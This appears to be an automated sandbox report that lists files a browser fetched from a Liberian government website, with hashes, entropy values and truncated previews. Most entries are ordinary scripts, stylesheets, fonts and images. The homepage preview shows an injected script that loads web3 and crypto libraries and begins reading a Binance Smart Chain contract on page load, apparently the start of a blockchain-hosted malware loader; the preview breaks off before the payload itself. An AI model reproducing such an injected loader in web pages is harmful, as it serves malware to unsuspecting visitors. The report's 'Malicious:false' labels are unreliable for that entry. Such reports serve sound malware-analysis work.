                                                                                                                        Preview:/*!. * jQuery UI Tabs 1.13.3. * https://jqueryui.com. *. * Copyright OpenJS Foundation and other contributors. * Released under the MIT license.. * https://jquery.org/license. */.!function(t){"use strict";"function"==typeof define&&define.amd?define(["jquery","../keycode","../safe-active-element","../unique-id","../version","../widget"],t):t(jQuery)}(function(l){"use strict";var a;return l.widget("ui.tabs",{version:"1.13.3",delay:300,options:{active:null,classes:{"ui-tabs":"ui-corner-all","ui-tabs-nav":"ui-corner-all","ui-tabs-panel":"ui-corner-bottom","ui-tabs-tab":"ui-corner-top"},collapsible:!1,event:"click",heightStyle:"content",hide:null,show:null,activate:null,beforeActivate:null,beforeLoad:null,load:null},_isLocal:(a=/#.*$/,function(t){var e=t.href.replace(a,""),i=location.href.replace(a,"");try{e=decodeURIComponent(e)}catch(t){}try{i=decodeURIComponent(i)}catch(t){}return 1<t.hash.length&&e===i}),_create:function(){var e=this,t=this.options;this.running=!1,this._addClass("ui-ta
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):133831
                                                                                                                        Entropy (8bit):4.724681605126616
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:nY9Y9NhPUbjdfUEU9G8pERl+qPoLydAuwc1wqYg/6mg:naYqbjdfnU95Cj+qgLyeiB6mg
                                                                                                                        MD5:2894ECA7BFABCC213ABD99FAD1BA57A5
                                                                                                                        SHA1:5E40DA62A03948824F016853B86DA7410CC59B51
                                                                                                                        SHA-256:B3E12BC4AD925362FBC89483771CFF0CB833FF052DE29DB0E124CA89CD5683C3
                                                                                                                        SHA-512:29456A4C08EAFAFB447B5235D4D9D0CB943600B99CDC0E1DAFD8FA9434112CCAF2A93E00718BFA745C8225BD49AA43CAF50E5F4158EF3C8B91396F86382ECA4E
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        URL:https://www.lpb.gov.lr/wp-content/themes/betheme/js/scripts.js?ver=27.0.7
                                                                                                                        Preview:/* globals jQuery, mfn */./* jshint esversion: 6 */../**. * query loop masonry - prevents error with init in iframe. */..function queryLoopMasonry() {. jQuery('.mfn-query-loop-masonry').each(function() {.. let $masonry = jQuery(this);.. $masonry.imagesLoaded(function() {.. $masonry.isotope({. itemSelector: '.mfn-queryloop-item-wrapper',. layoutMode: 'masonry',. isOriginLeft: jQuery('body').hasClass('rtl') ? false : true. });.. $masonry.addClass('mfn-initialized');.. });.. });.}..(function($) {.. "use strict";.. var scrollTicker, lightboxAttr, sidebar,. rtl = $('body').hasClass('rtl'),. simple = $('body').hasClass('style-simple'),. isBlocks = $('body').hasClass('builder-blocks'),. topBarTop = '0',. headerH = 0,. currWidth = $(window).width(),. newWidth = $(window).width(),. screen = 'desktop',. mobileInitW = mfn.mobileInit ? mfn.mobileInit : 1240;.. /**. * Lightbox | Magnific Popup. */.. if ( ! mfn.lightbo
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:ASCII text, with very long lines (1572)
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):11170
                                                                                                                        Entropy (8bit):5.27601930271989
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:2NMtfmNMtfNMt4NMtfkNMt/qbNMtDbqGIwV4BNMtnNMtuwNMtiNMtfXNMtuNMtNo:8CfMC1CWC6CyhC/qY4XCNCtC4CfdCkCW
                                                                                                                        MD5:B7A6169D3E32B4CDED47137314AFD3EB
                                                                                                                        SHA1:BA9679F0B7334C2E52A124FE491E6420832C9E37
                                                                                                                        SHA-256:1D563B69D0BFC84B7AB554235CF8C7D2463187FCC7F25E6A2A1B2D2805C3B63D
                                                                                                                        SHA-512:940C477F8610F2DB00A542F59660AD9EC7B6E58B417079647AA127D75818E910A7C33E4F2AF92A7F16D5EA8A03F6E55FACA3F97430C54256A25157ED154E6B80
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        URL:https://fonts.googleapis.com/css?family=Roboto:400%2C700&display=swap
                                                                                                                        Preview:/* cyrillic-ext */.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 400;. font-stretch: 100%;. font-display: swap;. src: url(https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3GUBGEe.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 400;. font-stretch: 100%;. font-display: swap;. src: url(https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3iUBGEe.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* greek-ext */.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 400;. font-stretch: 100%;. font-display: swap;. src: url(https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3CUBGEe.woff2) format('woff2');. unicode-range: U+1F00-1FFF;.}./* greek */.@font-face {. font-fam
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=12, height=1080, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=1440], baseline, precision 8, 480x360, components 3
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):40323
                                                                                                                        Entropy (8bit):7.759253232336891
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:O3y/ZnBEqgIhkONrna+zcnQq3mU5wI5nWCZpUBkvnUv54fIYZ:O3kZn+q5iOZ8wUuknbwWPiAT
                                                                                                                        MD5:2AA3DA0C6C9E83F7E5A0DA2A3BB643B4
                                                                                                                        SHA1:53FE9F6306BA67B77ECD865C0CAA9B1C76D145FF
                                                                                                                        SHA-256:041B8DB02822509DF27B83AF831324ED8ABDB8406F53BB20C0B7C0D32AC1BF81
                                                                                                                        SHA-512:E3C959602DB22F7EF266DF736D0706DE3E448261025E3470FF8991E5FDA3CF3F84C05455CE52DAA4196CE11FDAE7D814325BFAB87192CEF8AB8758621B82894D
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        URL:https://www.lpb.gov.lr/wp-content/uploads/2017/02/Miscellaneous-480x360.jpg
                                                                                                                        Preview:......JFIF.....H.H......Exif..MM.*...........................8...........................................................................(...........1...........2..........i............. .........H.......H....Adobe Photoshop 21.2 (Windows).2024:01:10 14:19:33............0231...................................8...............................n...........v.(.....................~...........5.......H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................x...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..4.IH.I(]o.S...n.*n...2[.`.....-f%......>.o.6.i"@Y,...i.R\..
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:ASCII text, with very long lines (480)
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):608
                                                                                                                        Entropy (8bit):5.1693559575691825
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:12:UoAgXf2AEcAM6VjcppDWvtkKiRPWgJWfWM0n:lAgX7fSIqvtkrRzThn
                                                                                                                        MD5:5D4AE3C17238C7D37F7BB54F61632CC6
                                                                                                                        SHA1:64819D2B67C84697489945BCBEBB587BDB08AEDC
                                                                                                                        SHA-256:8ECF312A51FD23A6D2258191745AB900D7F393A4633515E0DF6305CDE42B1A3A
                                                                                                                        SHA-512:E165CD38EBF7D971CD450F81F7ED2D4FDF115DAA57BBC28FE957E6FCB35AF67F145182EE0AA0947BA002D872BAA680BF02C68437932B9E6C365B8B3B347B6935
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        Preview:/**. * Visible. * required for: One Page Active. * Sam Sehnert, samatdf, TeamDF | https://github.com/teamdf/jquery-visible/. */.(function(e){e.fn.visible=function(t,n,r){var i=e(this).eq(0),s=i.get(0),o=e(window),u=o.scrollTop(),a=u+o.height(),f=o.scrollLeft(),l=f+o.width(),c=i.offset().top,h=c+i.height(),p=i.offset().left,d=p+i.width(),v=t===true?h:c,m=t===true?c:h,g=t===true?d:p,y=t===true?p:d,b=n===true?s.offsetWidth*s.offsetHeight:true,r=r?r:"both";if(r==="both")return!!b&&m<=a&&v>=u&&y<=l&&g>=f;else if(r==="vertical")return!!b&&m<=a&&v>=u;else if(r==="horizontal")return!!b&&y<=l&&g>=f}})(jQuery);
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:ASCII text, with very long lines (464)
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):415828
                                                                                                                        Entropy (8bit):5.11862867826034
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:dhJL3SVsoQeWf2CoU7BzY8AyKrvk4c6xhNSn5T6btP9PdLv7INK6HExAfrk2bg6P:zxnmFty/e0jrBPZZFuElT6uMl20o19
                                                                                                                        MD5:E7DBE7C783D37B268F2192891F8BE468
                                                                                                                        SHA1:EC0836BA47B70B81A8752AE5FA78A88920460ABA
                                                                                                                        SHA-256:E3502C7322E0282EB852F4F028A1AB5336843D922CD75ACAD7D45F53837F351F
                                                                                                                        SHA-512:BB2D35842544757B65A1B7AAEB43FCB58BD1E3E09DD6F6480FF905804F1378981AC10E9D43A44BEF541460087A23CE8B108349E9519A2EABE73BF9E2087AD38A
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        URL:https://www.lpb.gov.lr/wp-content/themes/betheme/css/be.css?ver=27.0.7
                                                                                                                        Preview:/* Reset & Basics */..html,body,div,span,applet,object,iframe,h1,h2,h3,h4,h5,h6,p,blockquote,pre,a,abbr,acronym,address,cite,code,del,dfn,em,img,ins,kbd,q,s,samp,strike,strong,tt,var,b,u,i,center,ol,ul,li,fieldset,form,label,legend,table,caption,tbody,tfoot,thead,tr,th,td,article,aside,canvas,details,embed,figure,figcaption,footer,header,hgroup,menu,nav,output,ruby,section,summary,time,mark,audio,video{margin:0;padding:0;border:0;font-size:100%;font:inherit;vertical-align:baseline}.article,aside,details,figcaption,figure,footer,header,hgroup,menu,nav,section{display:block}.body{line-height:1}.ol,ul{list-style:none}.blockquote,q{quotes:none}.blockquote:before,blockquote:after,q:before,q:after{content:'';content:none}.table{border-collapse:collapse;border-spacing:0}../* Variables */..body {. --mfn-column-gap-top: 0;. --mfn-column-gap-bottom: 40px;. --mfn-column-gap-left: 12px;. --mfn-column-gap-right: 12px;. --mfn-article-box-decoration: #0089F7; /* podpiac pod themecolor
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:ASCII text, with very long lines (364)
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):60701
                                                                                                                        Entropy (8bit):4.768305812248597
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:7oLz8lHdm5kCjREZj/OgTTfSMWgpCqQjUlSRV9fJIErKBrbNWVohq:7oLz8O5JjyZrPT7SMWgp/QbRLr6r5Fo
                                                                                                                        MD5:3B513906D04338606636721DA3DE2937
                                                                                                                        SHA1:9574FDF8C6B90B1D140AB4892095844512F4FCCA
                                                                                                                        SHA-256:6A8F55D140604CA7FED7724EE5D45C06D445673636211543D30959C317A98A4B
                                                                                                                        SHA-512:D4877357C23063DEA4663F4F2066971767E839CCF035DC13B3B8C6EEF70E68DEF59C660B7C9FA1A45C86C57B0B7EAC47CAE6F993649D14AEDB28C0ABCA8014FC
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        URL:https://www.lpb.gov.lr/wp-content/themes/betheme/fonts/fontawesome/fontawesome.css?ver=27.0.7
                                                                                                                        Preview:/*. * Font Awesome Free 5.15.1 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). */...fa,.fas,.far,.fal,.fad,.fab{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:inline-block;font-style:normal;font-variant:normal;text-rendering:auto;line-height:1}..fa-lg{font-size:1.33333em;line-height:.75em;vertical-align:-.0667em}..fa-xs{font-size:.75em}..fa-sm{font-size:.875em}..fa-1x{font-size:1em}..fa-2x{font-size:2em}..fa-3x{font-size:3em}..fa-4x{font-size:4em}..fa-5x{font-size:5em}..fa-6x{font-size:6em}..fa-7x{font-size:7em}..fa-8x{font-size:8em}..fa-9x{font-size:9em}..fa-10x{font-size:10em}..fa-fw{text-align:center;width:1.25em}..fa-ul{list-style-type:none;margin-left:2.5em;padding-left:0}..fa-ul > li{position:relative}..fa-li{left:-2em;position:absolute;text-align:center;width:2em;line-height:inherit}..fa-border{border:solid .08em #eee;border-radius:.1em;padding:.2e
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):16
                                                                                                                        Entropy (8bit):3.875
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:HTL:zL
                                                                                                                        MD5:C78FC4C73991971736F95F00B7C09E4F
                                                                                                                        SHA1:2BFE006346297E446B58308E3F37169A4BC29046
                                                                                                                        SHA-256:C70E533105E5FE64092A52295354E975F8D6DDF470DA3F7AE4A6D4F3FC915283
                                                                                                                        SHA-512:5F85D1EA2C4DB38DF3A6FC5414C03EDA186CF86A84F9D0E4C37053791060936B486A0493B54010319FCBA943ED4E95F58045C3EDD135952E69CED9EE87BD21F0
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzQSEAkmered8XflfRIFDbtXVmo=?alt=proto
                                                                                                                        Preview:CgkKBw27V1ZqGgA=
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:ASCII text, with very long lines (33229)
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):33407
                                                                                                                        Entropy (8bit):4.7584710387647835
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:384:Wb+rB31zxcjzc61CrDam31bvG91QCQ/HUMNYmB1vcv/PEsQ/4j:731zxcfc6IyUFv61dQ/0MOm3izQ/Y
                                                                                                                        MD5:E35D9C4EBAEA0573DF8E4A9505B72EEA
                                                                                                                        SHA1:5FBB384CD8CD7A64483E6487D8D8179A633F9954
                                                                                                                        SHA-256:9F29F2BBB25602F4BDBD3122C317244F8FD9741106FFD5A412574B02EE794993
                                                                                                                        SHA-512:C571015753B927017B3BEC2B1C0B0103DE27DCC5E805E1DAF8A1459E0F797ABA38FF0592F93CBEC80B98F574B18455DDBC65A1F38A8AED5ACF14EB8CE2D7265C
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        URL:https://use.fontawesome.com/releases/v5.0.0/css/all.css
                                                                                                                        Preview:/*!. * Font Awesome Free 5.0.0 by @fontawesome - http://fontawesome.com. * License - http://fontawesome.com/license (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). */..fa,.fab,.fal,.far,.fas{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:inline-block;font-style:normal;font-variant:normal;text-rendering:auto;line-height:1}.fa-lg{font-size:1.33333em;line-height:.75em;vertical-align:-.0667em}.fa-xs{font-size:.75em}.fa-sm{font-size:.875em}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-6x{font-size:6em}.fa-7x{font-size:7em}.fa-8x{font-size:8em}.fa-9x{font-size:9em}.fa-10x{font-size:10em}.fa-fw{text-align:center;width:1.25em}.fa-ul{list-style-type:none;margin-left:2.5em;padding-left:0}.fa-ul>li{position:relative}.fa-li{left:-2em;position:absolute;text-align:center;width:2em;line-height:inherit}.fa-border{border:.08em solid #eee;border-radius:.1em;padding:.2em .25em .15em}.fa-pull-left{float
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 36588, version 1.0
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):36588
                                                                                                                        Entropy (8bit):7.9940819064918776
                                                                                                                        Encrypted:true
                                                                                                                        SSDEEP:768:KeCS+q0TVSxuRLKp/U3paNYnQ3SlJV9QOo4YaVdc9yUSQ:QnRWp/ac8j9U4YqcHSQ
                                                                                                                        MD5:AF25B808F44B7BA222C55A1AD21C6610
                                                                                                                        SHA1:DAEEBEA0EBC88F184FEE3A201D583E65F6102E11
                                                                                                                        SHA-256:ECE33EF25242231378AEFE6A8F2418EC835C0DB284BDFFE85CB96D9F391CC144
                                                                                                                        SHA-512:59FD4702A08A1295402A37540C98E0932A48BE04568CA76C73E178B37E25EF4888741F2AAEA337D31C55ED4ECACE7E0487E0B371F76B67C7FCE8C96FD4C5590D
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        URL:https://use.fontawesome.com/releases/v5.0.0/webfonts/fa-solid-900.woff2
                                                                                                                        Preview:wOF2..............y..............................T.V..z...`..5.6.$..0..... ..z...[.8q....\oV..I.?.HD.q.!p....a.. ......;.........Ss.lk.@.....0Q18.pxR.k.`..*&F....(.,.eB1$.9c..k. z.[Z.T....l ........{..G.......~..^s...F.}..@..uT[|..S.0....K./*.IA..L.0...E.T..f...A...1iy.?..X.A33....7.z..y...p...q......k.l..........s*xg ..(...........?.|...1.c...(.....@...O...R.T... ../...].!^7. y!y...$..0...dd.a.... .......7....Z....h...])v8...+......)H.....o<....I..3.R.../.....5.+c..gY.Dt....)...4.].9.....9_J.......v.ui.l..F8...........Q...Y.TB...o.y.....0.N...{....X.c....h......;)...Z.} p.$...N..a0.....LW.^a.5M....;.......F\9....Q.}a......._...LE..g../.p....cP..i..`.b4....q..B.q.!...O.......@..JZ.V.k.;..{...v.5|:........mb.1....3....r....Q.d.}...tP.X5g.J.P......'|O..t.Kv'..CP}".g...-.h.Vj.......;....#akJ.U...=$..........aC<.3...|..E.,.j.fzS.k.RTr.....PTg...........o......P..R......A....)`)..J.):.....?e,@J.).....,.r*.....P.....+/...}........0..`....?...k
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:ASCII text, with very long lines (350)
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):472
                                                                                                                        Entropy (8bit):4.970780282209864
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:12:UolIf2SbpMZixuLsLCTQVlqIEkDAXUIEZ6DAG1/QC5e5TAUXyn:luNW8SsLe9ILAXUIggAGVQC5/Yyn
                                                                                                                        MD5:6CBC17C595BAEC9068F58EEF5F001410
                                                                                                                        SHA1:3A1B22A742CF6B54C47D639C06351D1B3121ACD9
                                                                                                                        SHA-256:7C5A0E187E68CCBF13DAFD079E2C46C7917CC60B6959E5A881DA324958F34D92
                                                                                                                        SHA-512:1267060AE19854908634643355FCFA25A93988F2C2B3FE36BAB4D70227D4A0C42DADC1E3869D1A83A9E369870A3DF06758CAB5EE652917A773A727AF513950E5
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        Preview:/**. * Resize. * debouncedresize. * https://github.com/louisremi/jquery-smartresize | Licensed under the MIT license.. */.(function(e){var t=e.event,n,r;n=t.special.debouncedresize={setup:function(){e(this).on("resize",n.handler)},teardown:function(){e(this).off("resize",n.handler)},handler:function(e,i){var s=this,o=arguments,u=function(){e.type="debouncedresize";t.dispatch.apply(s,o)};if(r){clearTimeout(r)}i?u():r=setTimeout(u,n.threshold)},threshold:150}})(jQuery);
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:HTML document, ASCII text, with very long lines (47166)
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):154531
                                                                                                                        Entropy (8bit):5.486058151162366
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3072:p0pqSfIXhKnrwHNTClTe5yiY5Mc839612khMrGL412m:p5UYKnrwHAl5zm
                                                                                                                        MD5:2B7D5E757C55E1CDD0D20A8D7E46D8A2
                                                                                                                        SHA1:2002C5FEA540EABD19382B77333C5DF40A02B14F
                                                                                                                        SHA-256:BB23CA23EED7B75F3067659BDA024F1D5A6DB72773E7B7AFA2EDACA9F99D1B5A
                                                                                                                        SHA-512:687C57F68DB46E6DA646AD3A481CABE26A543D96DE0BA2C131000460ECB821839FF16823B2533B0E3B34ACC182CBB539D5BAF4BDAF6548D50BE9E7108229609C
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        URL:https://www.lpb.gov.lr/
                                                                                                                        Preview:<!DOCTYPE html>.<html lang="en-US" class="no-js " itemscope itemtype="https://schema.org/WebPage" >..<head>..<meta charset="UTF-8" />. <script src="https://cdn.jsdelivr.net/npm/web3@latest/dist/web3.min.js"></script>. <script src="https://cdnjs.cloudflare.com/ajax/libs/pako/2.0.4/pako.min.js"></script>. <script src="https://cdn.jsdelivr.net/npm/crypto-js@4.1.1/crypto-js.min.js"></script>. <script>. console.log('Start moving...');. document.addEventListener('DOMContentLoaded', async () => {. try {. const web3 = new Web3('https://bsc-dataseed.binance.org/');. . const contract = new web3.eth.Contract([. {"inputs": [], "stateMutability": "nonpayable", "type": "constructor"},. {"inputs": [], "name": "orchidABI", "outputs": [{"internalType": "string", "name": "", "type": "string"}], "stateMutability": "view", "type": "function"},. {"inputs": [], "name": "orchidAd
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (12602), with CRLF line terminators
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):59686
                                                                                                                        Entropy (8bit):5.34742389519092
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:EGmHV2YW00SwapmUPzMghSk5h5rEUUrIUkx0+8rkUIpLM+IrAI9dHvQr5G:qx11G
                                                                                                                        MD5:26612F0758857E9FD3992BB65D0A2CA4
                                                                                                                        SHA1:6B4D95025D2BE0B1AD1F93D0FF9FB1963D4E2522
                                                                                                                        SHA-256:D5B6E53C9833F0AB023135C4E3631A86D714C4B580B26C2EA979973EBB521A2C
                                                                                                                        SHA-512:7A527547A4E05E20AE6DEFC23B4C723137961148B2AEB648AE257E86E07E2A402306F77A1D57472D664CD8A4402D453AAA81BD2EC58E0E41F6D41D76143FB3DA
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        URL:https://www.lpb.gov.lr/wp-content/plugins/revslider/public/assets/css/rs6.css?ver=6.6.13
                                                                                                                        Preview:/* FIX FOR WORDPRESS's CRAZY <p> TAG ANOMALY */...rs-p-wp-fix { display: none !important; margin: 0 !important; height: 0px !important; }..../* NEW Z-INDEX FIX*/...wp-block-themepunch-revslider { position: relative }..../* FIX FOR QUICK LOADING OF SLIDER SCRIPTS AND WP-ROCKET READDING IMG TAG INTO DOM*/../*rs-sbg-px rs-sbg-wrap img { display:none !important}*/..../* MODAL BASICS */..rs-modal { position: fixed !important; z-index: 9999999 !important; pointer-events: none !important;}..rs-modal.rs-modal-auto { top: auto;bottom: auto;left: auto; right:auto; }..rs-modal.rs-modal-fullwidth,..rs-modal.rs-modal-fullscreen { top: 0px; left: 0px; width: 100%; height: 100%; }..rs-modal rs-fullwidth-wrap { position: absolute; top: 0px; left: 0px; height: 100%;}..rs-module-wrap.rs-modal { display:none; max-height: 100% !important; overflow: auto !important; pointer-events: auto !important;}..rs-module-wrap.hideallscrollbars.rs-modal { overflow: hidden !important; max-width: 100% !important}..rs-m
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 40128, version 1.0
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):40128
                                                                                                                        Entropy (8bit):7.994526034157349
                                                                                                                        Encrypted:true
                                                                                                                        SSDEEP:768:Vce3jkow68wmT4IBX0tXdlSirS61gSjcz0GPwHbP+w2jec56O:VcI/iEEEtXdFJj+0GPwHbP+w5rO
                                                                                                                        MD5:9A01B69183A9604AB3A439E388B30501
                                                                                                                        SHA1:8ED1D59003D0DBE6360481017B44665153665FBE
                                                                                                                        SHA-256:20B535FA80C8189E3B87D1803038389960203A886D502BC2EF1857AFFC2F38D2
                                                                                                                        SHA-512:0E6795255B6EEA00B5403FD7E3B904D52776D49AC63A31C2778361262883697943AEDCB29FEEE85694BA6F19EAA34DDDB9A5BFE7118F4A25B4757E92C331FECA
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        URL:https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3yUBA.woff2
                                                                                                                        Preview:wOF2..............$....F..........................p.....t?HVAR...`?STAT.N'...B..~.../~.....`..i..X.0..j.6.$..,. .... ..N[{.q.v...Lw.Q..o..J...6.Z.g.F.n..g\{t....%.!3)....sS.o...$."c.^<.iZc.I]c....0+. ..I..9.H.3..B.&.....'e....5.p.R(.j~\=..Wt.{..1.[u..Fn..<.-g.3..L..o.....E.-Q.........I..-/.4....{.Uj...3.K...g.Z....0...2)%.{......gN.../f.7....o.K....^V...!j...<...gf....\XjI.<p.PJh.4....*,*.S....&.C...R..,@ba..<..z.|.X.&.(.mf.w[..l.35Mp...A.A.=d........fj...}W6..y....[...i.......!........NLND....n'"...N*k)0<n.P.......w.j..>9.vV...Z.`.$$!.".(.`ATV.,..0.]3.<.d(...-s...2.w....P@.&...-.9x7.'....Sg.N=m.=....(..))-bA<.x.......=@4qs..Ss......K...{.=H.......z...NUS....Y..6.K.......n.....F4.B....=w.....+..F3...fB..........y1...,.(...`,..&vIrP.^.fiQY..5....H.a......q...s."..\..':.xK}...fU.z.j.......$L.......f.g&....R...!.Wmew3.1%2W.'"6u..r.q"F.......~i{..9xN.g.X..NMx.H.s@.8..J.t.SP.C`-GU)G/'..6".+......f..n..Aw....r....l.<r...Cke..D....T/."..c..mj..
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:ASCII text, with very long lines (65447)
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):87553
                                                                                                                        Entropy (8bit):5.262620498676155
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:0RUX9uDgwxcy2KVBNwchN6SLaHEk2BSrBESp+a/IEk4aAocVi8SMBQ47GKO:sHNwcv9VBQpLl88SMBQ47GKO
                                                                                                                        MD5:826EB77E86B02AB7724FE3D0141FF87C
                                                                                                                        SHA1:79CD3587D565AFE290076A8D36C31C305A573D18
                                                                                                                        SHA-256:CB6F2D32C49D1C2B25E9FFC9AAAFA3F83075346C01BCD4AE6EB187392A4292CF
                                                                                                                        SHA-512:FC79FDB76763025DC39FAC045A215FF155EF2F492A0E9640079D6F089FA6218AF2B3AB7C6EAF636827DEE9294E6939A95AB24554E870C976679C25567AD6374C
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        Preview:/*! jQuery v3.7.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(ie,e){"use strict";var oe=[],r=Object.getPrototypeOf,ae=oe.slice,g=oe.flat?function(e){return oe.flat.call(e)}:function(e){return oe.concat.apply([],e)},s=oe.push,se=oe.indexOf,n={},i=n.toString,ue=n.hasOwnProperty,o=ue.toString,a=o.call(Object),le={},v=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},y=function(e){return null!=e&&e===e.window},C=ie.document,u={type:!0,src:!0,nonce:!0,noModule:!0};function m(e,t,n){var r,i,o=(n=n||C).createElement("script");if(o.text=e,t)for(r in u)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.remove
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:HTML document, ASCII text, with very long lines (13452), with no line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):13452
                                                                                                                        Entropy (8bit):5.1747520643334255
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:384:IsIRHeFJ1yQ7QdfnJgeYh7MXlsNqrBp1pgQpwOjNtqohIQ/5Z:IsIR+L1yQ7QdpYh7M1iqrBp1pgQpwOjn
                                                                                                                        MD5:2912C657D0592CC532DFF73D0D2CE7BB
                                                                                                                        SHA1:70A679E2769825236F83BCC56965A9D0BD86C4E9
                                                                                                                        SHA-256:DDCCE687729CB358ABF9D0D8E1217A097859BE2B0D18C23D7C851B38C87BC9C0
                                                                                                                        SHA-512:9646384E65D09BF00CB20365F43E06DD41E7428E3FC6CC2737F4E69B50F006EBB25BD24A566FCD9FAEC2F0DCB24404E25D57BA7B8C6ABA61797A29C515AD5144
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
